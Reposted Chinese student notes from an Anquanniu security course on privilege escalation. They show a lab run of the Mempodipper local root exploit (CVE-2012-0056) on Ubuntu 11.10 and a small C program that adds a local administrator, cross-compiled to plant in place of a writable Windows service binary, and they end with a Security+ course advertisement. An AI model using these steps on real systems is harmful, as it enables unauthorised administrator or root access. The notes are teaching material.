【安全牛学习笔记】利用配置不当提权

来源：互联网发布：2017nba数据统计编辑：程序博客网时间：2024/06/03 15:27

┃利用漏洞提权

┃Ubuntu11.10

┃http://old-releases.ubuntu.com/releases/11.10/

┃gcc

┃sudo apt-cdrom add && sudo apt-get install gcc

┃gcc 18411.c -o exp

┃CVE-2012-0056

┃/proc/pid/mem

┃kernels >=2.6.39

┃http://blog.zx2c4.com/749

root@kali:~# searchesploit cve-2012-0056

--------------------------------------------- ----------------------------------

Exploit Title | Path

|(/usr/share/exploitdb/platforms)

--------------------------------------------- ----------------------------------

root@kali:~# searchesploit 18411.c

--------------------------------------------- ----------------------------------

Exploit Title | Path

|(/usr/share/exploitdb/platforms)

--------------------------------------------- ----------------------------------

Linux kernel <= 2.6.39 (32-bit & 64-bit) - Mempodipper Local Root (1)

--------------------------------------------- ----------------------------------

root@kali:~# scp /usr/share/exploitdb/platforms/linux/local/18411.c yuanfh@192.168.1.149:home/yuanfh

The authenticaity of host '192.168.1.149(192.168.1.149)' can't be established.

ECDSA key fingerprint is 91:03:af:b1:a3:db:a3:db:94:88:a6:94:bc:a7:bc:b2:f5:fd.

Are you sure you want to continue connecting(yes/no)? yes

Warning: Permanently added '192.168.1.149' (ECDSA) to the list of known hosts.

yuanfh@192.168.1.149's password:

18411.c

yuanfh@usrv:~$ ls

18411.c

yuanfh@usrv:~$ gcc 18411.c -o exp

yuanfh@usrv:~$ ls

18411.c exp

yuanfh@usrv:~$ chmod +x exp

yuanfh@usrv:~$ ls

18411.c exp

yuanfh@usrv:~$ w

19:16:48 up 8 min , 2 users, load average: 0.00, 0.00, 0.00

USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT

yuanfh tty1 19:09 7:07 0.71s 0.62s -bash

yuanfh pts/0 192.168.1.118 19:11 0.00s 0.53s 0.00s w

yuanfh@usrv:~$ ./exp

===============================

= Mempodipper =

= by zx2c4 =

= Jan 21, 2012 =

===============================

[+] Waiting for transferred fd in parent.

[+] Executing child from child fork.

[+] Opening parent men /proc/1044/men in child.

[+] Sending fd 3 to parent.

[+] Received fd at 5.

[+] Assigning fd 5 to stderr.

[+] Reading su for exit@plt.

[+] Resolved exit@plt to 0x8049520.

[+] Calculating su padding.

[+] Seeking to offset 0x8049514.

[+] Excuting su with shellcode.

yuanfh@usrv:~$ ls /

bin etc lib mnt root selinux tmp vmlinuz

boot home lost+found opt run srv vsr

dev initrd.img media proc sbin sys var

yuanfh@usrv:~$ ls /mnt/

yuanfh@usrv:~$ ls /media/

cdrom

yuanfh@usrv:~$ ls /media/cdrom/

yuanfh@usrv:~$ sudo mount /dev/cdrom /media/cdrom

mount: black device /dev/sr0 is write-protected, mounting read-only

yuanfh@usrv:~$ ls /media/cdrom/

boot dists install md5sum.txt pool REAIME.diskdefines

cdromupgrade doc isolinux pics preseed ubuntu

yuanfh@usrv:~$ cat /etc/apt/soures.list

deb cdrom:[Ubuntu-Server 11.10 _Oneiric Ocelot_ - Release i386 (20111011)]/ oneiric main restricted

deb http://Ubuntu.uestc.edu.cn/ubuntu/ oneiric main restricted universe multiverse

deb http://Ubuntu.uestc.edu.cn/ubuntu/ oneiric-backprots main restricted universe multiverse

deb http://Ubuntu.uestc.edu.cn/ubuntu/ oneiric-proposed main restricted universe multiverse

deb http://Ubuntu.uestc.edu.cn/ubuntu/ oneiric-security main restricted universe multiverse

deb http://Ubuntu.uestc.edu.cn/ubuntu/ oneiric-updates main restricted universe multiverse

deb-src http://ubuntu.uestc.edu.cn/ubuntu/ oneiric main restricted universe multiverse

deb-src http://ubuntu.uestc.edu.cn/ubuntu/ oneiric-backports restricted universe multiverse

deb-src http://ubuntu.uestc.edu.cn/ubuntu/ oneiric-proposed restricted universe multiverse

deb-src http://ubuntu.uestc.edu.cn/ubuntu/ oneiric-security restricted universe multiverse

deb-src http://ubuntu.uestc.edu.cn/ubuntu/ oneiric-updates restricted universe multiverse

yuanfh@usrv:~$ sudo apt-cdrom add

Using CD-ROM mount point /mdeia/cdrom/

Identifying.. [e17dd4e604f0daacc6605e2934bdca-2]

Scanning disc for index files..

Found 2 package indexes, 0 source indexes, 0 translation indexs and 1 signatures

This disc is called:

'Ubuntu-Server 11.10 _Oneiric Ocelot_ -Release i386 (20111011)'

Copying package list...gpgv: Signature made Tue 11 Oct 2011 09:52:05 PM CST using DSA key ID FBB75451

gpgv: Good signature from "Ubuntu CD Image Automatic Signing Key <cdimage@ubuntu.com>"

Writing new source list

Source list entries for this disc are:

deb cdrom:[Ubuntu-Server 11.10 _Oneiric Ocelot_ - Release i386 (20111011)]/ oneiric main restricted

Repeat this proccess for the rest of the CDs in your set.

W: Skipping noneistent file /media/cdrom/dists/oneiric/main/binary-i386/Packages

W: Skipping noneistent file /media/cdrom/dists/oneiric/main/debain-installer/binary-i386/Packages

W: Skipping noneistent file /media/cdrom/dists/oneiric/restricted/binary-i386/Packages

W: Skipping noneistent file /media/cdrom/dists/oneiric/restricted/debain-installer/binary-i386/Packages

yuanfh@usrv:~$ sudo apt-get install gcc

╋━━━━━━━━━━━━━━━━━━━━━━━╋

┃利用配置不当提权 ┃

┃ 与漏洞提权相比更常用的方法 ┃

┃ 企业环境 ┃

┃ 补丁更新的全部已经安装 ┃

┃ 输入变量过滤之外更值得研发关注的安全隐患 ┃

┃ 以system权限启动 ┃

┃ NTFS权限允许users修改删除 ┃

╋━━━━━━━━━━━━━━━━━━━━━━━╋

┃用配置不当提权 ┃

┃ icacls ┃

┃ icacls c:\windows\*.exe /save perm /T ┃

┃ i586-mingw32msvc-gcc -o admin.exe admin.c ┃

┃ Find ┃

┃ find / -perm 777 -exec ls -l {} \ ┃

╋━━━━━━━━━━━━━━━━━━━━━━━╋

C:\Documents and Settings\Administrator>cd\

C:\>icacls

ICACLS name /save aclfile [/T] [/C] [/L] [/Q]

将匹配名称的文件和文件夹的 DACL 存储到 aclfile 中以便将来与

/restore 一起使用。请注意，未保存 SACL、所有者或完整性标签。

ICACLS directory [/substitute SidOld SidNew [...]] /restore aclfile

[/C] [/L] [/Q]

将存储的 DACL 应用于目录中的文件。

ICACLS name /setowner user [/T] [/C] [/L] [/Q]

更改所有匹配名称的所有者。该选项不会强制更改所有身份；

使用 takeown.exe 实用程序可实现该目的。

ICACLS name /findsid Sid [/T] [/C] [/L] [/Q]

查找包含显式提及 SID 的 ACL 的所有匹配名称。

ICACLS name /verify [/T] [/C] [/L] [/Q]

查找其 ACL 不规范或长度与 ACE 计数不一致的所有文件。

ICACLS name /reset [/T] [/C] [/L] [/Q]

为所有匹配文件使用默认继承的 ACL 替换 ACL。

ICACLS name [/grant[:r] Sid:perm[...]]

[/deny Sid:perm [...]]

[/remove[:g|:d]] Sid[...]] [/T] [/C] [/L]

[/setintegritylevel Level:policy[...]]

/grant[:r] Sid:perm 授予指定的用户访问权限。如果使用 :r，

这些权限将替换以前授予的所有显式权限。

如果不使用 :r，这些权限将添加到以前授予的所有显式权限。

/deny Sid:perm 显式拒绝指定的用户访问权限。

将为列出的权限添加显式拒绝 ACE，

并删除所有显式授予的权限中的相同权限。

/remove[:[g|d]] Sid 删除 ACL 中所有出现的 SID。使用

:g，将删除授予该 SID 的所有权限。使用

:d，将删除拒绝该 SID 的所有权限。

/setintegritylevel [(CI)(OI)] 级别将完整性 ACE 显式添加到所有

匹配文件。要指定的级别为以下级别之一:

L[ow]

M[edium]

H[igh]

完整性 ACE 的继承选项可以优先于级别，但只应用于

目录。

/inheritance:e|d|r

e - 启用继承

d - 禁用继承并复制 ACE

r - 删除所有继承的 ACE

注意:

Sid 可以采用数字格式或友好的名称格式。如果给定数字格式，

那么请在 SID 的开头添加一个 *。

/T 指示在以该名称指定的目录下的所有匹配文件/目录上

执行此操作。

/C 指示此操作将在所有文件错误上继续进行。仍将显示错误消息。

/L 指示此操作在符号链接本身而不是其目标上执行。

/Q 指示 icacls 应该禁止显示成功消息。

ICACLS 保留 ACE 项的规范顺序:

显式拒绝

显式授予

继承的拒绝

继承的授予

perm 是权限掩码，可以两种格式之一指定:

简单权限序列:

N - 无访问权限

F - 完全访问权限

M - 修改权限

RX - 读取和执行权限

R - 只读权限

W - 只写权限

D - 删除权限

在括号中以逗号分隔的特定权限列表:

DE - 删除

RC - 读取控制

WDAC - 写入 DAC

WO - 写入所有者

S - 同步

AS - 访问系统安全性

MA - 允许的最大值

GR - 一般性读取

GW - 一般性写入

GE - 一般性执行

GA - 全为一般性

RD - 读取数据/列出目录

WD - 写入数据/添加文件

AD - 附加数据/添加子目录

REA - 读取扩展属性

WEA - 写入扩展属性

X - 执行/遍历

DC - 删除子项

RA - 读取属性

WA - 写入属性

继承权限可以优先于每种格式，但只应用于

(OI) - 对象继承

(CI) - 容器继承

(IO) - 仅继承

(NP) - 不传播继承

(I) - 从父容器继承的权限

示例:

icacls c:\windows\* /save AclFile /T

- 将 c:\windows 及其子目录下所有文件的

ACL 保存到 AclFile。

icacls c:\windows\ /restore AclFile

- 将还原 c:\windows 及其子目录下存在的 AclFile 内

所有文件的 ACL。

icacls file /grant Administrator:(D,WDAC)

- 将授予用户对文件删除和写入 DAC 的管理员权限。

icacls file /grant *S-1-1-0:(D,WDAC)

- 将授予由 sid S-1-1-0 定义的用户对文件删除和写入 DAC 的权限。

C:\>icacls boot.ini

boot.ini BUILTIN\Power Users:<RX>

BUILTIN\Administrators:<F>

NT AUTHORITY\SYSTEM:<F>

Successfully processed 1 files; Failed processing 0 files

C:\>icacls c:\WINDOWS\*.exe /save asd /T

root@kali:~# gedit admin.c

-------------------------------------------------------------

#include <stdilb.h>

int main()

{

int i;

i=system ("net localgroup admininistrators a /add");

return 0;

}

--------------------------------------------------------------

root@kali:~# i586-mingw32msvc-gcc

i586-mingw32msvc-gcc i586-mingw32msvc-gcov

root@kali:~# i586-mingw32msvc-gcc -o admin.exe admin.c

root@kali:~# file admin.exe

admin.exe: PE32 executable (console) Intel 80386, for MS Windows

root@kali:~# cp admin.exe /media/sf_D_DRIVE/

root@kali:~# ls -l //查看文件权限

root@kali:~# find / -perm 777 -exec ls -l {} \

该笔记为安全牛课堂学员笔记，想看此课程或者信息安全类干货可以移步到安全牛课堂

Security+认证为什么是互联网+时代最火爆的认证？

牛妹先给大家介绍一下Security+

Security+ 认证是一种中立第三方认证，其发证机构为美国计算机行业协会CompTIA ；是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一，和CISSP偏重信息安全管理相比，Security+ 认证更偏重信息安全技术和操作。

通过该认证证明了您具备网络安全，合规性和操作安全，威胁和漏洞，应用程序、数据和主机安全，访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易，含金量较高，目前已被全球企业和安全专业人士所普遍采纳。

Security+认证如此火爆的原因？

原因一：在所有信息安全认证当中，偏重信息安全技术的认证是空白的， Security+认证正好可以弥补信息安全技术领域的空白。

目前行业内受认可的信息安全认证主要有CISP和CISSP，但是无论CISP还是CISSP都是偏重信息安全管理的，技术知识讲的宽泛且浅显，考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上，CISP也要求大专学历4年以上工作经验，这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中，无论是找工作还是升职加薪，或是投标时候报人员，认证都是必不可少的，这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍，由于Security+偏重信息安全技术，所以对工作经验没有特别的要求。只要你有IT相关背景，追求进步就可以学习和考试。

原因二： IT运维人员工作与翻身的利器。

在银行、证券、保险、信息通讯等行业，IT运维人员非常多，IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍，死亦写代码”的悲壮，但也有着“锄禾日当午，不如运维苦“的感慨。天天对着电脑和机器，时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识，掌握网络安全实践。职业发展朝着网络安全的方向发展，解决国内信息安全人才的匮乏问题。另外，即使不转型，要做好运维工作，学习安全知识取得安全认证也是必不可少的。

原因三：接地气、国际范儿、考试方便、费用适中！

CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。

在目前的信息安全大潮之下，人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的，相信Security+认证一定会成为最火爆的信息安全认证。

近期，安全牛课堂在做此类线上培训，感兴趣可以了解

阅读全文

0 0